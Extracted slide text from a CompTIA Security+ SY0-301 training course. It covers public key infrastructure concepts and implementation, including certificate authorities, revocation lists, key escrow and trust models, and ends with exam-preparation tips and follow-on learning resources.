Cryptography Tools
What We Covered
Cryptographic Hashing
SHA
MD5
RIPEMD
HMAC
Transport Encryption
SSL/TLS and HTTPS
SSH
IPSec
CompTIA Security+ Training
Cryptography Tools
What We Covered
Wireless Encryption
WEP vs. WPA/WPA2
Wi-Fi Authentication
Other Encryption Tools
PGP/GPG
One-time Pads
CHAP and PAP
NTLM and NTLMv2
Whole Disk Encryption
Comparative Strengths of Algorithms
Data Confidentiality Algorithms
Data Integrity Algorithms
CompTIA Security+ Training Instructor: Lisa Szpunar
Public Key Infrastructure (PKI) Concepts
CompTIA Security+ Training
Public Key Infrastructure (PKI) Concepts
In This Lesson:
Exam Objective:
6.3 Explain the core concepts of public key infrastructure
Public Key Infrastructure (PKI) Overview
The Public and Private Key Pair
Digital Certificates
Certificate Authorities (CA)
How PKI Works
Registration Authorities (RA)
Certificate Revocation Lists (CRL)
Recovery Agent: What if a Key Gets Lost?
Key Escrow
CompTIA Security+ Training
Public Key Infrastructure (PKI) Concepts
• A two key (asymmetric) encryption system for communication
• A framework not a specific technology
• Universal infrastructure that can work across multiple systems
and vendors
• Provides authentication and confidentiality
–Authentication: Confirms the owner of the keys using Digital Certificates
–Confidentiality: Encrypts data transmissions
Public Key Infrastructure (PKI) Overview
The Public and Private Key Pair
You request Alice’s public key
Alice sends her public key
You use Alice’s public key to encrypt the message
You send the encrypted message to Alice
Alice uses her private key to decrypt the message and read it
CompTIA Security+ Training
Public Key Infrastructure (PKI) Concepts
• Helps with authentication
• Associates a public key with an individual/company
• Issued by a Certificate Authority
Digital Certificates x.509 Certificate
Version
Serial Number
Algorithm ID
Issuer
Validity Not Before Not After
Subject
Subject Public Key Info Public Key Algorithm Subject Public Key
Issuer Unique Identifier (optional)
Subject Unique Identifier (optional)
Extensions (optional)
Certificate Signature Algorithm
Certificate Signature
CompTIA Security+ Training
Public Key Infrastructure (PKI) Concepts
Certificate Authorities (CA)
• Responsible for issuing, revoking, and distributing certificates
• Often a trusted third-party organization. Examples:
• DigiCert
• VeriSign
• Companies or organizations can have an in-house CA
• Stores the public key in a directory that is available to anyone that wants to verify your certificate
How PKI Works CA
You encrypt your message using Alice’s verified public key contained within the certificate
You send the encrypted message to Alice
Alice decrypts the message with her private key
CompTIA Security+ Training
Public Key Infrastructure (PKI) Concepts
• The front end entity that you actually interact with
• You provide the RA with your information (and payment)
• Verifies identity documentation before confirming that the CA
can issue the certificate
• Does not sign the certificate
Registration Authorities (RA)
CA
RA
CompTIA Security+ Training
Public Key Infrastructure (PKI) Concepts
• The CA publishes a list of certificates that can no longer be used
• Reasons a cert might be on the CRL
–Certificate Expiration
–Certificate Revocation (Permanent)
• Compromised private key
• Human Resources reasons
• Company changes names, physical address, DNS
• Any reason prior to expiration
–Certificate Suspended
• Will say “Certification Hold” as the reason for revocation
• Certificate owner/administrator can request the cert be revoked
Certificate Revocation Lists (CRL)
CompTIA Security+ Training
Public Key Infrastructure (PKI) Concepts
• A live person!
• Has access to the key recovery server
• Normally used by in-house CA implementations
• Sometimes two different recovery agents are both needed to recover one key
• Key recovery information (KRI)
–Proof that the request is from an authorized recovery agent
–Name of key owner
–Time key was created
– Issuing CA server
Recovery Agent: What if a Key Gets Lost?
CompTIA Security+ Training
Public Key Infrastructure (PKI) Concepts
• A copy (or copies) of your private key is kept in a key escrow agency or key archival system
–Sometimes there are multiple databases with only part of the private key is kept in each
• Used for law enforcement (with a warrant)
Key Escrow
CompTIA Security+ Training
Public Key Infrastructure (PKI) Concepts
Key Terms You Should Know
Term Definition
Public Key Infrastructure
PKI is the framework for encryption that associates a public key with a verified person/system
Public Key The part of the key pair that is available and distributed to the public
Private Key The part of the key pair that is secret and used only by the key owner
Certificate Authorities
CAs are responsible for issuing, revoking, and distributing digital certificates
Digital Certificates
A certificate that verifies whom the public key belongs to
CompTIA Security+ Training
Public Key Infrastructure (PKI) Concepts
Key Terms You Should Know
Term Definition
Registration Authority
The RA verifies the prospective key owner’s identify and sends it to the CA to issue a certificate
Certificate Revocation Lists
A list of certificates that are no longer useable. The list is frequently published
Recovery Agent A person who is authorized to recover lost private keys
Key Escrow Keeping secured copies of private keys for law enforcement purposes
CompTIA Security+ Training
Public Key Infrastructure (PKI) Concepts
What We Covered
Public Key Infrastructure (PKI) Overview
The Public and Private Key Pair
Digital Certificates
Certificate Authorities (CA)
How PKI Works
Registration Authorities (RA)
Certificate Revocation Lists (CRL)
Recovery Agent: What if a Key Gets Lost?
Key Escrow
Drag the red check boxes over the box bullet point of your choice. To edit or reorder the animations, go to the Animations Tab in the Ribbon Click Custom Animation and use the
Custom Animation task pane to edit the animations.
CompTIA Security+ Training Instructor: Lisa Szpunar
PKI Implementation
CompTIA Security+ Training
PKI Implementation
In This Lesson:
Exam Objective: 6.4 Implement PKI, certificate
management, and associated components
Publicly Trusted Certificate Authorities
Internal Certificate Authorities
Working with Registration Authorities
Key Management
Certificate Management
Trust Models
• Hierarchical
• Bridge
• Mesh
• Hybrid
CompTIA Security+ Training
PKI Implementation
• A trusted third party (TTP) issues and signs your digital certificate
• Web browsers already trust these TTP CA’s
• Available commercially
–VeriSign, Go Daddy, DigiCert
• Best used for publicly facing websites
–A self signed cert will confuse and alarm customers
• Pros
–Publically trusted
–Very little management overhead
• Cons
–Expensive to purchase multiple certificates
Publicly Trusted Certificate Authorities
CompTIA Security+ Training
PKI Implementation
• Used for intranets and other internal uses
–Hard drive and file encryption
–Digitally signing documents
• Pros
– Lower cost
–Greater control
• Cons
– Intensive management overhead
• Configuring and troubleshooting support for the protocols, systems, and applications at your company
• What trust model to use and its scalability
• Interoperability with business partners
Internal Certificate Authorities
CompTIA Security+ Training
PKI Implementation
• Server operating systems can be configured to provide PKI services
• Microsoft Stand-alone CAs vs. Enterprise CAs
–Stand-alone CA’s do not need Active Directory directory services to function
• There can still be subordinate CA’s
–Enterprise CA’s rely on Active Directory for its directory services
Internal Certificate Authorities
CompTIA Security+ Training
PKI Implementation
Chicago Branch Office New York Central Office
• Great for verifying user credentials in person
• Local registration authorities (LRA)
–Useful for internal PKIs that have distributed locations
Working with Registration Authorities
LRA
CA
CompTIA Security+ Training
PKI Implementation
• Key generation and signing
• Centralized keys
– Created and stored by the CA
• Decentralized keys
– Created by the user and submitted to the CA to sign
• Key repository
–Public keys can be centrally located in a key repository
Key Management
CompTIA Security+ Training
PKI Implementation
• Key recovery
–Key archiving
• Configure tools built in to your internal PKI to do this automatically
–Assign users to be recovery agents
–M of N control
• M number of employees out of N number of recovery agents need to be involved in key recovery
Key Management
CompTIA Security+ Training
PKI Implementation
• Created and handled PKI certs in accordance with the organization's overall security policy
• Certificate policies
–Policies for certificate issuing, usage, renewal, and archiving
• Certificate Practice Statement (CPS)
–The procedures that a CA will follow and expects its users to follow
Certificate Management Security Policy
Certificate Policies
Certificate Practice
Statement
Certificate Management: Life Cycle
Request or Renewal
• A request is sent to the RA or directly to the CA if a RA does not exist
• A renewal request is made prior to an existing certificate’s expiration
• The requester’s identity is verified
Request
or
Renewal
Issuing
Use
Expiration
or Revocation
Destruction
Request
or
Renewal
Certificate Management: Life Cycle
Issuing
• A key pair is generated
• The corresponding cert is created, signed, and sent to the requester
Request
or
Renewal
Issuing
Use
Expiration
or Revocation
Destruction
Certificate Management: Life Cycle
Certificate Use
• The certificate is used by its owner until its expiration date
• If the private key is compromised the owner must notify the CA
Request
or
Renewal
Issuing
Use
Expiration
or Revocation
Destruction
Certificate Management: Life Cycle
Expiration or Revocation
• The user must notify the CA/RA immediately if a private key was lost or compromised
• An expired or revoked certificate is placed on the CRL
• The CRL is published and the information is disseminated
Request
or
Renewal
Issuing
Use
Expiration
or Revocation
Destruction
Certificate Management: Life Cycle
Destruction
• Permanently removing keys/cert that are no longer needed
• Only the private key needs to be deleted because the public key is useless without its private counterpart
Request
or
Renewal
Issuing
Use
Expiration
or Revocation
Destruction
CompTIA Security+ Training
PKI Implementation
• Single CA
–A small PKI implementation with only one root CA
• Hierarchical
–A top down trust structure
–The higher CAs sign the certificate of their subordinate CAs
• Mesh
–Two way trust (cross certification) happens between all CAs
–Each CA is both the root and the subordinate
• Bridge
–A two way trust exists between two hierarchical PKIs
• Hybrid
–A mix of two or more of models for the most flexible structure
Trust Models
Hierarchical Trust Model
CA
RA
Root CA
Intermediate CAs
Leaf CAs
CA CA
CA
CA CA CA
Subord
inate
CAs
Mesh Trust Model
CA
CA
CA
Bridge Trust Model
Bridge CA
CompTIA Security+ Training
PKI Implementation
Key Terms You Should Know
Term Definition
Local Registration Authority
A local authority used to identify an individual for certificate issuance even if the CA is located elsewhere
M of N Control
When referring to private key recovery: out of N total recovery agents only M are needed to be present to recover a key
Certificate Policies
PKI certificate polies that align with the overall security policies for the organization. Incudes policies for certificate issuing, usage, renewal, and archiving certificates and keys
Certificate Practice Statement
The procedures that a CA will follow and expects its users to follow. These procedures are derived from the PKI certificate policies
CompTIA Security+ Training
PKI Implementation
Key Terms You Should Know
Term Definition
Hierarchical Trust Model
A top down trust model where each level of CAs sign the certificate for the CAs directly below them except for the root CA which signs its own certificate
Bridge Trust Model A bridge CA creates a cross-certification between two PKI trust structures
Mesh Trust Model
A cross-certification happens between pairs of CAs creating a mesh structure. Every CA is both the root and the subordinate
Hybrid Trust Model A combination of any two or more trust models
CompTIA Security+ Training
PKI Implementation
What We Covered
Publicly Trusted Certificate Authorities
Internal Certificate Authorities
Working with Registration Authorities
Key Management
Certificate Management
Trust Models
• Hierarchical
• Bridge
• Mesh
• Hybrid
CompTIA Security+ Training Instructor: Lisa Szpunar
Preparing for Your CompTIA Security+
SY0-301 Certification Exam
CompTIA Security+ Training
Preparing for Your CompTIA Security+ SY0-301 Certification Exam
In This Lesson:
About the Exam
Mapping Exam Objectives to This Course
Studying for the Exam
Test Day Tips
CompTIA Security+ Training
Preparing for Your CompTIA Security+ SY0-301 Certification Exam
• Exam code SY0-301 (replaced SY0-201) in December 2011
• 100 questions
• 90 minutes
• A passing score is 750 out of 900 points
• Recommended experience:
–CompTIA Network+ certification
–Two years of technical networking experience, with an emphasis on security
• Take the exam through Pearson VUE or Prometric
About the Exam
CompTIA Security+ Training
Preparing for Your CompTIA Security+ SY0-301 Certification Exam
• Accredited by
– International Organization for Standardization (ISO)
–American National Standards Institute (ANSI)
• Topic Domains
–Network security
–Compliance and operational security
–Threats and vulnerabilities
–Application, data, and host security
–Access control and identity management
–Cryptography
About the Exam
Mapping Exam Objectives to this Course
1.0 Network Security Course Lessons
1.1 Explain the security function and purpose of network devices and technologies
Network Device Security
1.2 Apply and implement secure network administration principles
Secure Network Administration
1.3 Distinguish and differentiate network design elements and compounds
Secure Network Design
1.4 Implement and use common protocols
TCP/IP Protocols and Port Security
1.5 Identify commonly used default network ports
TCP/IP Protocols and Port Security
1.6 Implement wireless networks in a secure manner
Securing Wireless Networks
Mapping Exam Objectives to this Course
2.0 Compliance and Operational Course Lessons
2.1 Explain risk related concepts Risk Mitigation and Deterrence Risk Management
2.2 Carry out appropriate risk mitigation strategies
Risk Mitigation and Deterrence
2.3 Execute appropriate incident response procedures
Incident Response
2.4 Explain the importance of security related awareness and training
User Education
2.5 Compare and contrast aspects of business continuity
Business Continuity
2.6 Explain the impact and proper use of environmental controls
Physical and Environmental Security
2.7 Execute disaster recovery plans and procedures
Disaster Recovery Planning
2.8 Exemplify the concepts of confidentiality, integrity, and availability
Introduction to IT Security
Security
Mapping Exam Objectives to this Course
3.0 Threats and Vulnerabilities Course Lessons
3.1 Analyze and differentiate among types of malware
Malware Prevention and Cleanup
3.2 Analyze and differentiate among types of attacks
Types of Attacks
3.3 Analyze and differentiate among types of social engineering attacks
Social Engineering
3.4 Analyze and differentiate among types of wireless attacks
Attacks on Wireless Networks
3.5 Analyze and differentiate among types of application attacks
Securing Applications
3.6 Analyze and differentiate among types of mitigation and deterrent techniques
Secure Network Administration
Risk Mitigation and Deterrence
Log Monitoring and Reporting
Physical and Environmental Security
Mapping Exam Objectives to this Course
3.0 Threats and Vulnerabilities (cont.) Course Lessons
3.7 Implement assessment tools and techniques to discover security threats and vulnerabilities
Risk Management Threat and Vulnerability Assessment and Detection
3.8 Within the realm of vulnerability assessments, explain the proper use of penetration testing versus vulnerability scanning
Risk Management Threat and Vulnerability Assessment and Detection
4.0 Application, Data, and Host Security Course Lessons
4.1 Explain the importance of application security
Securing Applications
4.2 Carry out appropriate procedures to establish host security
Host Security Physical and Environmental Security
4.3 Explain the importance of data security
Data Security
Mapping Exam Objectives to this Course
5.0 Access Control and Identity Management
Course Lessons
5.1 Explain the function and purpose of authentication services
Authentication Services
5.2 Explain the fundamental concepts and best practices related to authentication, authorization, and access control
Authentication Services Authentication, Authorization, and Access Control
5.3 Implement appropriate security controls when performing account management
User Account Management
Mapping Exam Objectives to this Course
6.0 Cryptography Course Lessons
6.1 Summarize general cryptography concepts
Cryptography Concepts
6.2 Use and apply appropriate cryptographic tools and products
Cryptography Tools
6.3 Explain the core concepts of public key infrastructure
Public Key Infrastructure (PKI) Concepts
6.4 Implement PKI, certificate management, and associated components
PKI Implementation
CompTIA Security+ Training
Preparing for Your CompTIA Security+ SY0-301 Certification Exam
• Rewatch lessons
• Transcender study materials
• Vocabulary document
• Acronym document
Studying for the Exam
CompTIA Security+ Training
Preparing for Your CompTIA Security+ SY0-301 Certification Exam
• Arrive 15 - 30 min before the test is scheduled to begin
• You must bring two forms of identification
–One must be a current, government-issued photo ID
–Both must have your signature
• Do not bring personal items into the testing center
–No notes, mobile phones, or calculators
• Be prepared
–Study!
–Get a good night of sleep
Test Day Tips
CompTIA Security+ Training Instructor: Lisa Szpunar
Next Steps
CompTIA Security+ Training
Next Steps
In This Lesson:
What We Have Covered in This Course
My Favorite Supporting Resources
Get Certified
Continue Learning
Join the Community
We Value Your Opinion
What We Have Covered in This Course
Getting Started with CompTIA Security+ Training
Introduction to IT Security
Types of Attacks
Malware Prevention and Cleanup
Network Device Security
Secure Network Administration
Secure Network Design
TCP/IP Protocols and Port Security
What We Have Covered in This Course
Attacks on Wireless Networks
Securing Wireless Networks
Host Security
Securing Applications
Data Security
Authentication, Authorization, and Access Control
Physical and Environmental Security
Authentication Services
User Account Management
What We Have Covered in This Course
Risk Management
Threat and Vulnerability Assessment and Detection
Risk Mitigation and Deterrence
Log Monitoring and Reporting
Business Continuity
Disaster Recovery Planning
Incident Response
User Education
Social Engineering
What We Have Covered in This Course
Cryptography Concepts
Cryptography Tools
Public Key Infrastructure (PKI) Concepts
PKI Implementation
Preparing for your CompTIA Security + SY0-301 Certification Exam
Next Steps
CompTIA Security+ Training
Next Steps
My Favorite Supporting Resources
• Information About the Exam: http://certification.comptia.org/getCertified/certifications/security.aspx
• My Favorite Security+ Book:
Dulaney, Emmett A. CompTIA Security+ Deluxe Study Guide: Exam SY0-301. Indianapolis: Wiley Technology Pub., 2011.
• National Institute of Standards and Technology – Information Technology Portal:
http://www.nist.gov/information-technology-portal.cfm
CompTIA Security+ Training
Next Steps
• Aligned with This course
–CompTIA Security+ exam number SY0-301
–Watch the lesson titled, “Preparing for Your CompTIA Security+ SY0-301 Certification Exam“
–Watch the Transcender lessons
• Entry Level Networking
–CompTIA Network+
• Advanced Security Certifications
–CASP: CompTIA Advanced Security Practitioner – CompTIA
–CISSP: Certified Information Systems Security Professional – ISC2
• Specific Security Specialization Certifications
Get Certified
Continue Learning: Specialized Certifications
Topic Acronym Certification Name Certified
By
Auditing Techniques
GSNA GIAC Systems and Network Auditor
GIAC
CISA Certified Information Systems Auditor
ISACA
Penetration Testing CEH Certified Ethical Hacker EC–Council
Wireless Security CWSP Certified Wireless Security Professional
CWNP
Computer Forensics CHFI Computer Hacking Forensic Investigator
EC–Council
Secure Coding Practices
CSSLP Certified Secure Software Lifecycle Professional
ISC2
GSSP GIAC Secure Software Programmer
GIAC
CompTIA Security+ Training
Next Steps
• Topics for Further Study
–Windows or other OS specific security
–Application security
–Auditing techniques
–Penetration testing
–Wireless security
–Computer forensics
–Mobile device security
Continue Learning
CompTIA Security+ Training
Next Steps
• Blogs/Newsletters
–Schneier on Security: www.schneier.com
• Magazines
–Search Security: searchsecurity.techtarget.com
–SC MAGAZINE: www.scmagazineus.com
• Podcasts
–Network Security Podcast: netsecpodcast.com
–CyberSpeak's Podcast: cyberspeak.libsyn.com
Continue Learning
CompTIA Security+ Training
Next Steps
• Professional Organizations
– Information Systems Security Association (ISSA)
• www.issa.org/
– Information Systems Audit and Control Association (ISACA)
• www.isaca.org/
– Information Security Forum
• www.securityforum.org/
• Connect with other IT security pros, organizations, and vendors through social media
– Forums
Join the Community
CompTIA Security+ Training
Next Steps
We Value Your Opinion
Next Steps
There are so many ways to reach us!
• Call us at 1-888-229-5055 (worldwide: 1-847-776-8800)
• Email us at [email protected]
• Post on our forums at http://forums.trainsignal.com/
Join the TrainSignal Conversation
http://www.trainsignal.com/blog
http://www.facebook.com/trainsignal
http://twitter.com/trainsignal
http://twitter.com/Lisa_Spooner
http://www.trainsignal.com
http://www.youtube.com/trainsignalinc
Become a Fan on Facebook
View Our YouTube Channels
Follow Us on Twitter
Check Out Our Blog
Find Info on IT Training
Follow Me on Twitter